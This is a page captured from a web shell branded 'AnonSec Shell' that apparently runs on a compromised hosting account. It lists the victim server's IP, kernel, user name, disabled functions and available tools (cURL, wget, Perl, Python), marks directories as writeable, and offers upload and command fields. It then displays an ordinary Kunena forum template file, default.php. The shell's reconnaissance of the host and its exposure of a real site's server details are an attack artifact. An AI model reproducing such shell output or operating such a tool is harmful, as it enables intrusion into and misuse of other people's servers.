AnonSec Shell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.94
Web Server : Apache
System : Linux webm013.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : coopiak ( 151928)
PHP Version : 8.3.23
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/coopiak/amisdesseniors-fr/aix/components/com_kunena/template/aurelia/layouts/page/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/coopiak/amisdesseniors-fr/aix/components/com_kunena/template/aurelia/layouts/page/default.php
<?php

/**
 * Kunena Component
 *
 * @package         Kunena.Template.Aurelia
 * @subpackage      Layout.Widget
 *
 * @copyright       Copyright (C) 2008 - 2025 Kunena Team. All rights reserved.
 * @license         https://www.gnu.org/copyleft/gpl.html GNU/GPL
 * @link            https://www.kunena.org
 **/

namespace Kunena\Forum\Site;

\defined('_JEXEC') or die();

use Kunena\Forum\Libraries\Factory\KunenaFactory;

$templateParams = KunenaFactory::getTemplate()->params;
?>

<div id="kunena" class="layout <?php echo $this->options->get('pageclass_sfx'); ?>">
    <?php

    if ($templateParams->get('displayMenu')) {
        echo $this->subLayout('Widget/MenuBar');
    }

    if ($templateParams->get('displayModule')) {
        echo $this->subLayout('Widget/Module')->set('position', 'kunena_top');
    }

    if ($templateParams->get('displayBreadcrumb')) {
        echo $this->subLayout('Widget/Breadcrumb')->set('breadcrumb', $this->breadcrumb);
    }

    echo $this->subLayout('Widget/Module')->set('position', 'kunena_announcement');

    if ($templateParams->get('displayAnnouncement')) {
        echo $this->subRequest('Widget/Announcement');
    }

    // Display current view/layout
    echo $this->content;

    if ($templateParams->get('displayBreadcrumb')) {
        echo $this->subLayout('Widget/Breadcrumb')->set('breadcrumb', $this->breadcrumb);
    }

    if ($templateParams->get('displayModule')) {
        echo $this->subLayout('Widget/Module')->set('position', 'kunena_bottom');
    }

    if ($templateParams->get('displayFooter')) {
        echo $this->subLayout('Widget/Footer');
    }
    ?>
</div>

Anon7 - 2022
AnonSec Team